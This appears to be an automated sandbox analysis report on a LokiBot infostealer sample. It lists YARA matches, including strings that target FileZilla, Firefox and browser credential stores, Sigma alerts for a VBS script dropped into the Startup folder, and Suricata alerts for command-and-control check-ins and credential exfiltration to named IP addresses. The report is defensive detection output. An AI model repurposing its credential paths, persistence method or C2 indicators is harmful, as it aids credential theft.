22.2.palladiums.exe.3830000.1.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
22.2.palladiums.exe.3830000.1.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
36.2.palladiums.exe.2010000.1.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
36.2.palladiums.exe.2010000.1.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
36.2.palladiums.exe.2010000.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
36.2.palladiums.exe.2010000.1.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
36.2.palladiums.exe.2010000.1.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
36.2.palladiums.exe.2010000.1.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
36.2.palladiums.exe.2010000.1.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
36.2.palladiums.exe.2010000.1.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
37.2.palladiums.exe.2ee0000.1.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
37.2.palladiums.exe.2ee0000.1.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
37.2.palladiums.exe.2ee0000.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
37.2.palladiums.exe.2ee0000.1.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
37.2.palladiums.exe.2ee0000.1.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
37.2.palladiums.exe.2ee0000.1.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
37.2.palladiums.exe.2ee0000.1.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
37.2.palladiums.exe.2ee0000.1.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
11.2.palladiums.exe.3680000.1.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
11.2.palladiums.exe.3680000.1.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
11.2.palladiums.exe.3680000.1.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
11.2.palladiums.exe.3680000.1.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
11.2.palladiums.exe.3680000.1.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
14.2.palladiums.exe.ad0000.1.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
14.2.palladiums.exe.ad0000.1.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
14.2.palladiums.exe.ad0000.1.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
14.2.palladiums.exe.ad0000.1.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
14.2.palladiums.exe.ad0000.1.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
27.2.palladiums.exe.3a70000.1.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
27.2.palladiums.exe.3a70000.1.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
27.2.palladiums.exe.3a70000.1.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
27.2.palladiums.exe.3a70000.1.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
27.2.palladiums.exe.3a70000.1.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
23.2.palladiums.exe.1440000.1.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
23.2.palladiums.exe.1440000.1.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
23.2.palladiums.exe.1440000.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
23.2.palladiums.exe.1440000.1.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
23.2.palladiums.exe.1440000.1.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
23.2.palladiums.exe.1440000.1.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
23.2.palladiums.exe.1440000.1.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
23.2.palladiums.exe.1440000.1.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
27.2.palladiums.exe.3a70000.1.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
27.2.palladiums.exe.3a70000.1.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
27.2.palladiums.exe.3a70000.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
27.2.palladiums.exe.3a70000.1.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
27.2.palladiums.exe.3a70000.1.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
27.2.palladiums.exe.3a70000.1.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
27.2.palladiums.exe.3a70000.1.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
27.2.palladiums.exe.3a70000.1.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
12.2.palladiums.exe.1b30000.1.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
12.2.palladiums.exe.1b30000.1.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
12.2.palladiums.exe.1b30000.1.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
12.2.palladiums.exe.1b30000.1.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
12.2.palladiums.exe.1b30000.1.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
32.2.palladiums.exe.3b60000.1.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
32.2.palladiums.exe.3b60000.1.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
32.2.palladiums.exe.3b60000.1.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
32.2.palladiums.exe.3b60000.1.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
32.2.palladiums.exe.3b60000.1.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
32.2.palladiums.exe.3b60000.1.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
32.2.palladiums.exe.3b60000.1.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
32.2.palladiums.exe.3b60000.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
32.2.palladiums.exe.3b60000.1.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
32.2.palladiums.exe.3b60000.1.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
32.2.palladiums.exe.3b60000.1.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
32.2.palladiums.exe.3b60000.1.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
32.2.palladiums.exe.3b60000.1.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
31.2.palladiums.exe.1a60000.1.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
31.2.palladiums.exe.1a60000.1.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
31.2.palladiums.exe.1a60000.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
31.2.palladiums.exe.1a60000.1.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
31.2.palladiums.exe.1a60000.1.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
31.2.palladiums.exe.1a60000.1.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
31.2.palladiums.exe.1a60000.1.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
31.2.palladiums.exe.1a60000.1.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
30.2.palladiums.exe.38b0000.1.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
30.2.palladiums.exe.38b0000.1.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
30.2.palladiums.exe.38b0000.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
30.2.palladiums.exe.38b0000.1.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
30.2.palladiums.exe.38b0000.1.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
30.2.palladiums.exe.38b0000.1.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
30.2.palladiums.exe.38b0000.1.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
30.2.palladiums.exe.38b0000.1.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
20.2.palladiums.exe.3cf0000.1.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
20.2.palladiums.exe.3cf0000.1.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
20.2.palladiums.exe.3cf0000.1.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
20.2.palladiums.exe.3cf0000.1.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
20.2.palladiums.exe.3cf0000.1.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
2.2.palladiums.exe.37a0000.1.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
2.2.palladiums.exe.37a0000.1.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
2.2.palladiums.exe.37a0000.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.palladiums.exe.37a0000.1.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
2.2.palladiums.exe.37a0000.1.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
2.2.palladiums.exe.37a0000.1.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
2.2.palladiums.exe.37a0000.1.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
2.2.palladiums.exe.37a0000.1.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
33.2.palladiums.exe.1670000.1.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
33.2.palladiums.exe.1670000.1.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
33.2.palladiums.exe.1670000.1.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
33.2.palladiums.exe.1670000.1.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
33.2.palladiums.exe.1670000.1.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
4.2.Dhy2kmz.exe.458c248.3.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
4.2.Dhy2kmz.exe.67c0000.10.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
4.2.Dhy2kmz.exe.42b31a8.0.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
4.2.Dhy2kmz.exe.3f7cde8.1.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Click to see the 366 entries

Sigma Signatures

System Summary

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\palladiums.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\palladiums.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\palladiums.vbs" , ProcessId: 1292, ProcessName: wscript.exe

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\9876567899.bat.exe", CommandLine: "C:\Users\user\Desktop\9876567899.bat.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\9876567899.bat.exe", ParentImage: C:\Users\user\AppData\Local\preinhered\palladiums.exe, ParentProcessId: 7092, ParentProcessName: palladiums.exe, ProcessCommandLine: "C:\Users\user\Desktop\9876567899.bat.exe", ProcessId: 6784, ProcessName: svchost.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\palladiums.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\palladiums.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\palladiums.vbs" , ProcessId: 1292, ProcessName: wscript.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\Desktop\9876567899.bat.exe", CommandLine: "C:\Users\user\Desktop\9876567899.bat.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\9876567899.bat.exe", ParentImage: C:\Users\user\AppData\Local\preinhered\palladiums.exe, ParentProcessId: 7092, ParentProcessName: palladiums.exe, ProcessCommandLine: "C:\Users\user\Desktop\9876567899.bat.exe", ProcessId: 6784, ProcessName: svchost.exe

Data Obfuscation

Sigma detected: Drops script at startup location

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\preinhered\palladiums.exe, ProcessId: 7092, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\palladiums.vbs

Suricata Signatures

ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-07T11:02:00.833300+0100	2022053	1	A Network Trojan was detected	194.15.112.248	443	192.168.2.5	49707	TCP

ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-07T11:01:57.233864+0100	2024312	1	A Network Trojan was detected	192.168.2.5	49704	172.245.123.11	80	TCP
2025-01-07T11:01:57.878406+0100	2024312	1	A Network Trojan was detected	192.168.2.5	49705	172.245.123.11	80	TCP

ET MALWARE LokiBot Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-07T11:01:56.715463+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49704	172.245.123.11	80	TCP
2025-01-07T11:01:57.382609+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49705	172.245.123.11	80	TCP
2025-01-07T11:01:57.943923+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49706	172.245.123.11	80	TCP
2025-01-07T11:01:58.646333+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49708	172.245.123.11	80	TCP
2025-01-07T11:01:59.326148+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49709	172.245.123.11	80	TCP
